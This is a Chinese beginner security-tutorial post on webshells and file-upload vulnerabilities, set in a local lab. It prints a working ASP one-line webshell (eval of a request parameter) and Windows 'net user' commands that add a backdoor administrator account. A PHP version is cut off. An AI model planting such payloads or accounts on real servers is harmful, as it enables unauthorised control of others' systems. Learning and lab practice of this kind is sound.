从零开始学安全--第8天

webshell上传和一句话木马

webshell是利用ASP或PHP等脚本语言编写的web的木马后门。通过WebShell可以控制Web站点,包括上传下载文件、查看数据库、执行系统命令等。
上传漏洞的利用目的:将webshell上传到目标服务器中。

用一些写好的大马文件上传到web服务其中,我们用小旋风AspWeb搭建南方数据5.0,上传文件就直接把大马文件放到网站根目录下了,然后我们访问:
在这里插入图片描述
里面可以直接访问服务器电脑,提权功能很强大
net user hacker 123 /add 创建用户
net localgroup adminstrators hacker /add 提权

一句话木马是一小段的ASP或者PHP代码,相当于小型的webshell。可以将一句话木马保存成单独的网页文件,也可以将代码插入到网站的某个asp或php网页文件中。后面通过菜刀这种软件来远程连接,一样可以对服务器操作:
ASP:

<%eval request("password")%>
PHP:
<?php @eva
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值